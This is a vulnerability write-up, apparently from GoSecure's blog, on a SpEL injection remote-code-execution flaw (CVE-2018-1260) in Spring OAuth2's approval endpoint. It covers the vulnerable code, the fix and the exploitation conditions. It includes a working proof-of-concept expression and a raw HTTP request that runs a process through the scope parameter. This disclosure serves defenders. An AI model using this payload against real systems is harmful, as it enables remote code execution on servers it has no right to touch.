Analyzing a potential vulnerability
It all started by the report of the bug pattern SPEL_INJECTION by Find Security Bugs. It reported the use of
SpelExpressionParser.parseExpression()
with a dynamic parameter, the same API used in the previous vulnerability we had found. The expression parser is used to parse expressions placed between curly brackets "${...}".public SpelView(String template) { this.template = template; this.prefix = new RandomValueStringGenerator().generate() + "{"; this.context.addPropertyAccessor(new MapAccessor()); this.resolver = new PlaceholderResolver() { public String resolvePlaceholder(String name) { Expression expression = parser.parseExpression(name); //Expression parser Object value = expression.getValue(context); return value == null ? null : value.toString(); } }; }The controller class
WhitelabelApprovalEndpoint
uses this SpelView class to build the approval page for OAuth2 authorization flow. The SpelView class evaluates the string named "template" - see code below - as a Spring Expression.@RequestMapping("/oauth/confirm_access") public ModelAndView getAccessConfirmation(Map<String, Object> model, HttpServletRequest request) throws Exception { String template = createTemplate(model, request); if (request.getAttribute("_csrf") != null) { model.put("_csrf", request.getAttribute("_csrf")); } return new ModelAndView(new SpelView(template), model); //template variable is a SpEL }Following the methods createTemplate() and createScopes(), we can see that the attribute "scopes" is appended to the HTML template which will be evaluated as an expression. The only model parameter bound to the template is a CSRF token. However, the CSRF token will not be under the control of a remote user.
protected String createTemplate(Map<String, Object> model, HttpServletRequest request) { String template = TEMPLATE; if (model.containsKey("scopes") || request.getAttribute("scopes") != null) { template = template.replace("%scopes%", createScopes(model, request)).replace("%denial%", ""); } [...] private CharSequence createScopes(Map<String, Object> model, HttpServletRequest request) { StringBuilder builder = new StringBuilder("<ul>"); @SuppressWarnings("unchecked") Map<String, String> scopes = (Map<String, String>) (model.containsKey("scopes") ? model.get("scopes") : request .getAttribute("scopes")); //Scope attribute loaded here for (String scope : scopes.keySet()) { String approved = "true".equals(scopes.get(scope)) ? " checked" : ""; String denied = !"true".equals(scopes.get(scope)) ? " checked" : ""; String value = SCOPE.replace("%scope%", scope).replace("%key%", scope).replace("%approved%", approved) .replace("%denied%", denied); builder.append(value); } builder.append("</ul>"); return builder.toString(); }At this point, we are unsure if the scopes attribute can be controlled by the remote user. While attribute (req.getAttribute(..)) represents session values stored server-side, scope is an optional parameter part of OAuth2 flow. The parameter might be accessible to the user, saved to the server-side attributes and finally loaded into the previous template.
After some research in the documentation and some manual tests, we found that "scope" is a GET parameter part of the implicit OAuth2 flow. Therefore, the implicit mode would be required for our vulnerable application.
Proof-of-Concept and Limitations
When testing our application, we realized that the scopes were validated against a scopes whitelist defined by the user/client. If this whitelist is configured, we can't be creative with the parameter scope. If the scopes are simply not defined, no validation is applied to the name of the scopes. This limitation will likely make most Spring OAuth2 applications safe.
This first request made used the scope "${1338-1}", see picture below. Based on the response, we now have a confirmation that the scope parameter's value can reach the SpelView expression evaluation. We can see in the resulting HTML multiples instances of the string "scope.1337".
Pushing the probe value ${1338-1} |
A second test was made using the expression "${T(java.lang.Runtime).getRuntime().exec("calc.exe")}" to verify that the expressions are not limited to simple arithmetic operations.
Simple proof-of-concept request spawning a calc.exe subprocess |
For easier reproduction, here is the raw HTTP request from the previous screenshot. Some characters - mainly curly brackets - were not supported by the web container and needed to be URL encoded in order to reach the application. { -> %7b
POST /oauth/authorize?response_type=code&client_id=client&username=user&password=user&grant_type=password&scope=%24%7bT(java.lang.Runtime).getRuntime().exec(%22calc.exe%22)%7d&redirect_uri=http://csrf.me HTTP/1.1 Host: localhost:8080 Authorization: Bearer 1f5e6d97-7448-4d8d-bb6f-4315706a4e38 Content-Type: application/x-www-form-urlencoded Accept: */* Content-Length: 0
Reviewing The Fix
The solution chosen by the Pivotal team was to replace SpelView with a simpler view, with basic concatenation. This eliminates all possible paths to a SpEL evaluation. The first patch proposed introduced a potential XSS vulnerability, but luckily this was spotted before any release was made. The scope values are now properly escaped and free from any injection.
More importantly, this solution improved the security of another endpoint: WhitelabelErrorEndpoint. The endpoint is also no longer uses a Spel View. It was found vulnerable to an identical attack vector in 2016. Spring-OAuth2 also used the SpelView class to build the error page. The interesting twist is that the template parameter was static, but the parameters bound to the template were evaluated recursively. This means that any value in the model could lead to a Remote Code Execution.
Example with simple values |
Example with an expression included in the model |
This recursive evaluation was fixed by adding a random prefix to the expression boundary. The security of this template now relies on the randomness of 6 characters (62 possibilities to the power of 6). Some analysts were skeptical regarding this fix and raised the risk of a race condition if enough attempts are made. However, this is no longer a possibility since SpelView was also removed from this endpoint.
The SpelView class is also present in Spring Boot. This implementation has a custom resolver to avoid recursion. This means that while the Spring-OAuth2 project no longer uses it, some other components, or proprietary applications, might have reused (copy-pasted) this utility class to save some time. For this reason, a new detector looking for SpelView was introduced in Find Security Bugs. The detector does not look for a specific package name because we assume that the application will likely have a copy of the SpelView class rather than a reference to Spring-OAuth2 or Spring Boot classes.
Limitation & exploitability
We encourage you to keep all your web applications' dependencies up-to-date. If for any reason you must delay the last month's updates, here are the specific conditions for exploitation:
- Spring OAuth2 in your dependency tree
- The users must have implicit flow enabled; it can be enabled along with other grant types
- The scope list needs to be empty (not explicitly set to one or more elements)
Conclusion
This was the second and last article of the series on SpEL injection vulnerabilities. We hope it brought some light on this less frequent vulnerability class.
As mentioned previously in Part 1, finding this vulnerability class in your own application is unlikely. It is more likely to come up in components similar to Spring-Data or Spring-OAuth. If you are a Java developer or tasked with reviewing Java code for security, you could scan your application using Find Security Bugs, the tool we used to find this vulnerability. This type of vulnerability hunting can be daunting because many code patterns cause indirection, making variable tracking harder.
Kudos to Alvaros Muñoz, pyn3rd and Gal Goldshtein who reproduced the vulnerability and documented the flaw a few days after the official announcement made by Pivotal.
Reference
- https://pivotal.io/security/cve-2018-1260: Official vulnerability announcement by Pivotal
- https://pivotal.io/security/cve-2016-4977: Similar vulnerability affecting Spring-OAuth2
- https://docs.spring.io/spring/docs/3.0.x/reference/expressions.html: Spring Expression language capabilities
- http://find-sec-bugs.github.io/bugs.htm#SPEL_INJECTION: Bug description from Find Security Bugs
This post was originally posted on GoSecure's blog
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